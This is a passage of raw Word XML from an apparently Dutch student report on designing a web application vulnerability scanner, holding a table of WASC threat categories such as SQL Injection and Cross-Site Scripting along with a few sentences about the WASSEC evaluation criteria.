      <w:pPr>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Table 3.4</w:t>
      </w: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E29ED58"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9037F6">
        <w:t xml:space="preserve">. Het </w:t>
      </w:r>
      <w:r w:rsidR="00344125">
        <w:t>zal</w:t>
      </w:r>
      <w:r w:rsidR="009037F6">
        <w:t xml:space="preserve"> ook</w:t>
      </w:r>
      <w:r w:rsidR="00344125">
        <w:t xml:space="preserve"> in de datastructuur van mijn database model opgenomen worden.</w:t>
      </w:r>
      <w:r w:rsidR="00C65259">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CF21DF">
        <w:t>Niet alle a</w:t>
      </w:r>
      <w:r w:rsidR="009037F6">
        <w:t xml:space="preserve">anvallen of kwetsbaarheden </w:t>
      </w:r>
      <w:r w:rsidR="00CF21DF">
        <w:t>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GridTable4-Accent4"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1043"/>
        <w:gridCol w:w="4071"/>
        <w:gridCol w:w="3946"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C4355C" w14:paraId="0FB24774" w14:textId="09E801AE"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4FE6F45E" w14:textId="6DF30BB9" w:rsidR="00C4355C" w:rsidRDefault="00C4355C" w:rsidP="00C41D9B">
            <w:r>
              <w:t>WACS ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4072" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A39A897" w14:textId="79B295B7" w:rsidR="00C4355C" w:rsidRDefault="00C4355C" w:rsidP="00C41D9B">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Threats type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3947" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24952BEE" w14:textId="2FED9826" w:rsidR="00C4355C" w:rsidRDefault="00C4355C" w:rsidP="00C41D9B">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C4355C" w14:paraId="096B766F" w14:textId="09C31A63"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456BEF4D" w14:textId="6A4197DE" w:rsidR="00C4355C" w:rsidRDefault="007F5385" w:rsidP="00C41D9B">
            <w:r>
              <w:t>WASC-42</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4072" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58C845B9" w14:textId="05A76422"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1CD80209" w14:textId="26BA358C" w:rsidR="00C4355C" w:rsidRDefault="00FF14C4" w:rsidP="00C41D9B">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Abuse of functionality</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C4355C" w14:paraId="6B208109" w14:textId="25D2E458" w:rsidTr="004B5F85">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1043" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7AAB2603" w14:textId="06926D5C" w:rsidR="00C4355C" w:rsidRDefault="00210DAB" w:rsidP="00C41D9B">
            <w:r>
              <w:t>WASC-11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4072" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12DE28F2" w14:textId="6B2B4FDD" w:rsidR="00C4355C" w:rsidRDefault="0062456B"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268ECBFA" w14:textId="47D2ADA1" w:rsidR="00C4355C" w:rsidRDefault="00FF14C4" w:rsidP="00C41D9B">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Brute Force</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C4355C" w14:paraId="0CDEF67C" w14:textId="4F33FEA6"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cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>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cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A72BD2">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>SQL Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C4355C" w14:paraId="0B5647C3" w14:textId="28EBB863" w:rsidTr="004B5F85">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1043" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60A2A4DF" w14:textId="0F7C7AD5" w:rsidR="00C4355C" w:rsidRDefault="00564AD5" w:rsidP="00C41D9B">
            <w:r>
              <w:t>WASC-12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4072" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A9BF732" w14:textId="14999D7A" w:rsidR="00C4355C" w:rsidRDefault="0062456B"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760D73DF" w14:textId="619344FC" w:rsidR="00C4355C" w:rsidRDefault="00FF14C4" w:rsidP="00C41D9B">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Content</w:t>
            </w:r>
            <w:r w:rsidR="00B24EF5">
              <w:t xml:space="preserve"> Spoofin</w:t>
            </w:r>
            <w:r w:rsidR="005F57CF">
              <w:t>g</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C4355C" w14:paraId="3E525417" w14:textId="7D231DE8"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80BA9FB" w14:textId="24459FBB" w:rsidR="00C4355C" w:rsidRDefault="00F9236D" w:rsidP="00C41D9B">
            <w:r>
              <w:t>WASC-18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4072" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4284C71E" w14:textId="0B37C41D"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473F3CB3" w14:textId="35B2C951" w:rsidR="00C4355C" w:rsidRDefault="00151CEE" w:rsidP="00C41D9B">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Credential/Session Predicition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C4355C" w14:paraId="17B059E3" w14:textId="60087CC3" w:rsidTr="004B5F85">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>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cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A72BD2">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>Aanvallen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3947" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40A72798" w14:textId="235D3828" w:rsidR="00C4355C" w:rsidRPr="00A72BD2" w:rsidRDefault="002A117B" w:rsidP="00C41D9B">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A72BD2">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>Cross-Site Scripting</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C4355C" w14:paraId="1D811A3F" w14:textId="67A6DB7E"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637520DF" w14:textId="63163B95" w:rsidR="00C4355C" w:rsidRDefault="008852CA" w:rsidP="00C41D9B">
            <w:r>
              <w:t>WASC-9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4072" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F7AE8D3" w14:textId="10EE3796"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073F527C" w14:textId="47D585FB" w:rsidR="00C4355C" w:rsidRDefault="002A117B" w:rsidP="00C41D9B">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Cross-Site Request Forgery</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002836D1" w14:paraId="1CE4E6CF"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25919AB5" w14:textId="6C9A43A6" w:rsidR="002836D1" w:rsidRDefault="00ED5122" w:rsidP="00C41D9B">
            <w:r>
              <w:t>WAC-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4072" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DE8E3A6" w14:textId="39C744A8" w:rsidR="002836D1" w:rsidRDefault="002836D1"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4A724599" w14:textId="23AF09DA" w:rsidR="002836D1" w:rsidRDefault="00CF21DF" w:rsidP="00C41D9B">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Denial of Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002836D1" w14:paraId="0A1F8321"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cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007E389C">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>Weaknesses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3947" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6DF92579" w14:textId="079AEB6A" w:rsidR="002836D1" w:rsidRPr="007E389C" w:rsidRDefault="007B0E31" w:rsidP="00C41D9B">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007E389C">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>Application Misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002836D1" w14:paraId="26C176E5"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0E175A5B" w14:textId="3832AB3C" w:rsidR="002836D1" w:rsidRDefault="008A5B7F" w:rsidP="00C41D9B">
            <w:r>
              <w:t>WASC-16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4072" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30F208E9" w14:textId="4F0F232D" w:rsidR="002836D1" w:rsidRDefault="007B0E31" w:rsidP="00C41D9B">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Weaknesses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3947" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="504CA0CB" w14:textId="704B86F8" w:rsidR="002836D1" w:rsidRDefault="00B04B1C" w:rsidP="00C41D9B">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Insecure Indexing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002836D1" w14:paraId="5EA83FFF"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cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00542A74">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>Weaknesses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3947" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E24A3AE" w14:textId="0A9F4775" w:rsidR="002836D1" w:rsidRPr="00542A74" w:rsidRDefault="006C12F5" w:rsidP="00C41D9B">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00542A74">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>Information Leakage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002836D1" w14:paraId="75E143DA"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514C0FC6" w14:textId="59DC184C" w:rsidR="002836D1" w:rsidRDefault="004730EE" w:rsidP="00C41D9B">
            <w:r>
              <w:t>WASC-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4072" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E05EFB3" w14:textId="3EBA1B58" w:rsidR="002836D1" w:rsidRDefault="007B0E31" w:rsidP="00C41D9B">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Weaknesses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3947" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74C99EE2" w14:textId="7934BB9C" w:rsidR="002836D1" w:rsidRDefault="006C12F5" w:rsidP="00C41D9B">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Insufficient Authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002836D1" w14:paraId="0E261ADA"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5F12AF1D" w14:textId="3EF21C99" w:rsidR="002836D1" w:rsidRDefault="00623127" w:rsidP="00C41D9B">
            <w:r>
              <w:t>WACS-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4072" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6AD4DD0D" w14:textId="3DFC9117" w:rsidR="002836D1" w:rsidRDefault="007B0E31" w:rsidP="00C41D9B">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Weaknesses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3947" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03311CAF" w14:textId="43EB5E81" w:rsidR="002836D1" w:rsidRDefault="006C12F5" w:rsidP="00C41D9B">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Insufficient Athorization</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002836D1" w14:paraId="70F9F579"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cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D066CA">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>Weaknesses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3947" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="117C84A9" w14:textId="699E89AB" w:rsidR="002836D1" w:rsidRPr="00D066CA" w:rsidRDefault="009D0671" w:rsidP="00C41D9B">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D066CA">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>Server Misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="24FACCCB" w14:textId="382A626E" w:rsidR="001514C5" w:rsidRDefault="00030C1A" w:rsidP="00C41D9B">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00294937">
        <w:t>Tabel 3.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAA22E0" w14:textId="11AE3D70" w:rsidR="001A6577" w:rsidRDefault="001A6577">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7470A457" w14:textId="42FA68A2" w:rsidR="00825BDD" w:rsidRDefault="00394B19" w:rsidP="00C41D9B">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252148736" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1B8CE7A5" wp14:editId="4427E8D1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-895350</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-2997139</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="466" name="Rectangle 46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E0B72" id="Rectangle 466" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.5pt;margin-top:-235.95pt;width:25pt;height:1031.7pt;z-index:-2511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" fillcolor="#eae655" strokecolor="#ebe755" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="008E1C57">
        <w:t>WASSEC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29248CA3" w14:textId="01D7C00F"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452B90">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006770FA">
        <w:t>(data verwerker)</w:t>
      </w:r>
      <w:r w:rsidR="00B96E68">
        <w:t>, sessie manager, testing</w:t>
      </w:r>
      <w:r w:rsidR="00990729">
        <w:t xml:space="preserve"> vaardigheid en de</w:t>
      </w:r>
      <w:r w:rsidR="00646F06">
        <w:t xml:space="preserve"> component die</w:t>
      </w:r>
      <w:r w:rsidR="00B96E68">
        <w:t xml:space="preserve"> het rapport genereerd.</w:t>
      </w:r>
      <w:r w:rsidR="006770FA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B193640" w14:textId="1C2D18CF" w:rsidR="00D404A0" w:rsidRDefault="00B1749C" w:rsidP="00C41D9B">
      <w:r>
        <w:t xml:space="preserve">Nu zal ik ook </w:t>
      </w:r>
      <w:r w:rsidR="00200B29">
        <w:t xml:space="preserve">na het ontwikkelen van mijn Proof of Concept dit document gebruiken om op de correcte wijze een </w:t>
      </w:r>
      <w:r w:rsidR="009721C3">
        <w:t>webapplicatie</w:t>
      </w:r>
      <w:r w:rsidR="006A512C">
        <w:t xml:space="preserve"> te evalueren. </w:t>
      </w:r>
      <w:r w:rsidR="009C5666">
        <w:t xml:space="preserve">Het document behandeld alle onderwerpen die nodig zijn bij het uitvoeren en evalueren van een </w:t>
      </w:r>
      <w:r w:rsidR="009721C3">
        <w:t>webapplicatie</w:t>
      </w:r>
      <w:r w:rsidR="009C5666">
        <w:t xml:space="preserve"> scan. </w:t>
      </w:r>
      <w:r w:rsidR="007D7A79">
        <w:t xml:space="preserve">Het </w:t>
      </w:r>
      <w:r w:rsidR="00D404A0">
        <w:t xml:space="preserve">laat zien waar een </w:t>
      </w:r>
      <w:r w:rsidR="009721C3">
        <w:t>webapplicatie</w:t>
      </w:r>
      <w:r w:rsidR="00D404A0">
        <w:t xml:space="preserve"> scanner aan moet voldoen en</w:t>
      </w:r>
      <w:r w:rsidR="00F60A48">
        <w:t xml:space="preserve"> hoe</w:t>
      </w:r>
      <w:r w:rsidR="00D404A0">
        <w:t xml:space="preserve"> het op een effectieve manier gebruikt kan worden. </w:t>
      </w:r>
      <w:r w:rsidR="00745FB8">
        <w:t>De categorieën die behandeld worden in dit document</w:t>
      </w:r>
      <w:r w:rsidR="00D404A0">
        <w:t xml:space="preserve"> zijn:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent4"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1612"/>
        <w:gridCol w:w="2411"/>
        <w:gridCol w:w="3963"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AF4630" w14:paraId="73992BFF"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B562FF" w14:textId="3FD1D3DB" w:rsidR="00AF4630" w:rsidRDefault="00AF4630" w:rsidP="00C41D9B">
            <w:r>
              <w:t>Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2411" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35271848" w14:textId="3E329CC7" w:rsidR="00AF4630" w:rsidRDefault="00AF4630" w:rsidP="00C41D9B">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Categorie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3963" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37DB5002" w14:textId="0B97C655" w:rsidR="00AF4630" w:rsidRDefault="00AF4630" w:rsidP="00C41D9B">
            <w:pPr>
